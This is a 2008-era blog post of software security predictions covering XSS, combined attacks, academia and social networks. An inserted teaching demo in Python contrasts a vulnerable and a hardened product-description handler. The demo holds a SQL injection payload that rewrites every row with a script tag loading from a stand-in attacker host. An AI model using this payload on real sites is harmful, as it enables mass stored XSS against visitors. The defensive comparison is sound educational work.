
Top 5 Software Security Predictions for 2008
1. More Software Security Vendor Acquisitions
As the industry matures there will be more consolidation. As larger mainstream vendors buy up software security companies, the tools those companies built will get wider distribution, but that will not necessarily translate into deeper adoption, because adoption up to now has been driven largely by the evangelism of the independent vendors themselves.
2. Cross Site Scripting is the New Buffer Overflow
Buffer overflows used to allow attackers to run arbitrary code on servers, where the valuable data lived. Now that most new server-side applications are written in memory-safe, managed languages such as Java and the .NET languages, buffer overflows are on the decline (compare the OWASP Top 10 for 2004, which listed buffer overflows as its own category, with the 2007 edition, which dropped them). With Web 2.0 and other trends moving more data onto the client side, hosted in browsers, the ability to run malicious code in client browsers (XSS) will become paramount for attackers. Cross site scripting as a class of problem also encompasses many subtle variations (reflected, stored and DOM-based, plus a long tail of encoding and filter-evasion tricks) that will persist even after the obvious XSS flaws have been addressed, just as we saw with buffer overflows when attackers moved from stack overflows to heap overflows to format string attacks.
3. More Combined Attacks on the Horizon
General awareness of software security issues has improved in recent years. Most developers these days have at least heard of SQL injection attacks, and tool adoption by large organizations has started to stem the tide of SQL injection and other simple vulnerabilities in high-profile and critical applications. As these individual pieces become more secure, attackers will start to look for more subtle attacks. These will involve combining different attack vectors, such as SQL injection and Cross Site Scripting (XSS). The recent mass SQL injection attack that injected malicious HTML and JavaScript into databases, turning a server-side injection flaw into stored XSS served to every visitor, is a good example and a harbinger of things to come. Also, using Cross Site Request Forgery (CSRF) attacks to weave attacks across separate applications will continue to gain steam. As the components become more mature, more vulnerabilities will come from the interactions between those components.
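The SQL injection to stored XSS chain that items 2 and 3 describe, as an added example that is not part of the original post: a catalog "edit description" handler that concatenates its SQL lets one request rewrite every row with a script tag, which the unencoded page then serves to every visitor; the hardened version binds parameters and HTML-encodes at output. The table, columns, sample rows and the attacker host evil.example are all made up for the demo.

```python
import html
import sqlite3

# Added example, not code from the original post. Table name, columns, sample rows
# and the attacker host below are assumptions for the demo.

PAYLOAD_HOST = "evil.example"  # hypothetical attacker-controlled host


def make_db():
    """Constructed sample data: an in-memory catalog with two products."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, description TEXT)"
    )
    conn.executemany(
        "INSERT INTO products (name, description) VALUES (?, ?)",
        [("Widget", "A fine widget"), ("Gadget", "A useful gadget")],
    )
    conn.commit()
    return conn


def update_description_vulnerable(conn, product_id, description):
    """Builds the UPDATE by string concatenation; both arguments are attacker-controlled."""
    sql = (
        f"UPDATE products SET description = '{description}' "
        f"WHERE id = {product_id}"
    )
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount  # how many rows the attacker actually rewrote


def update_description_safe(conn, product_id, description):
    """Same operation with bound parameters: the payload is stored as inert text."""
    cur = conn.execute(
        "UPDATE products SET description = ? WHERE id = ?",
        (description, int(product_id)),
    )
    conn.commit()
    return cur.rowcount


def render_vulnerable(conn):
    """Concatenates database text straight into HTML, so stored XSS fires in every browser."""
    rows = conn.execute("SELECT name, description FROM products ORDER BY id").fetchall()
    return "<ul>" + "".join(f"<li>{n}: {d}</li>" for n, d in rows) + "</ul>"


def render_safe(conn):
    """HTML-encodes every field at the output boundary, whatever got into the database."""
    rows = conn.execute("SELECT name, description FROM products ORDER BY id").fetchall()
    return "<ul>" + "".join(
        f"<li>{html.escape(n)}: {html.escape(d)}</li>" for n, d in rows
    ) + "</ul>"


# The injected value closes the string literal, widens the WHERE clause to every row and
# comments out the rest of the statement, so a single request poisons the whole table.
INJECTED_DESCRIPTION = (
    f'<script src="http://{PAYLOAD_HOST}/a.js"></script>\' WHERE 1=1 --'
)


def demo_vulnerable():
    """Returns (rows rewritten, script tags in the rendered page) for the weak code path."""
    conn = make_db()
    affected = update_description_vulnerable(conn, "1", INJECTED_DESCRIPTION)
    page = render_vulnerable(conn)
    return affected, page.count("<script")


def demo_safe():
    """Returns (rows rewritten, script tags served, payload stored verbatim) for the hardened path."""
    conn = make_db()
    affected = update_description_safe(conn, "1", INJECTED_DESCRIPTION)
    page = render_safe(conn)
    stored = conn.execute("SELECT description FROM products WHERE id = 1").fetchone()[0]
    return affected, page.count("<script"), stored == INJECTED_DESCRIPTION


if __name__ == "__main__":
    print("vulnerable: rows rewritten, script tags served:", demo_vulnerable())
    print("hardened: rows rewritten, script tags served, payload stored inert:", demo_safe())
```

The two fixes are independent and both are needed: parameter binding keeps the injection from reaching other rows, and output encoding keeps whatever does land in the database (through this handler or any other) from executing in the browser. Note that the weak path never needed stacked queries; widening an UPDATE's WHERE clause is enough to replicate the "every text column now contains a script tag" effect of the mass injection attacks.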
4. Academia Will Start to Get In On the Act
Up to this point there has been comparatively limited work done in academia that was specifically focused on software security. In 2008 I suspect several prominent institutions will announce software security-specific efforts. This is great because it will hopefully start the long road toward security being taught throughout the computer science curriculum rather than as specialized add-on coursework.
5. Social Networking is Going to Have a Rough Year
With so many people involved in multiple Social Networking sites, so much valuable personal data stored in those sites, and increasing programmability being opened up to third parties, vulnerabilities will skyrocket, because the threats and countermeasures in this environment are not yet well understood.
2007 was a tremendously exciting year for application security and I think 2008 is going to blow it away. Tremendous strides have been made in education, testing and countermeasures, but equal if not greater progress has been made by attackers as they evolve their methods and, even more importantly, their goals.
–Dan
PS – Picture is another I took in Costa Rica. It has been LOLGuana-ed up solely to aggravate Sheridan Chambers, who hates LOLCats more than anyone I know. Even I’m getting annoyed so I guess I ought to lay off for a while.
Have you seen lolcode.com?
The requisite “hello world” is below.
HAI
CAN HAS STDIO?
VISIBLE "HAI WORLD!"
KTHXBYE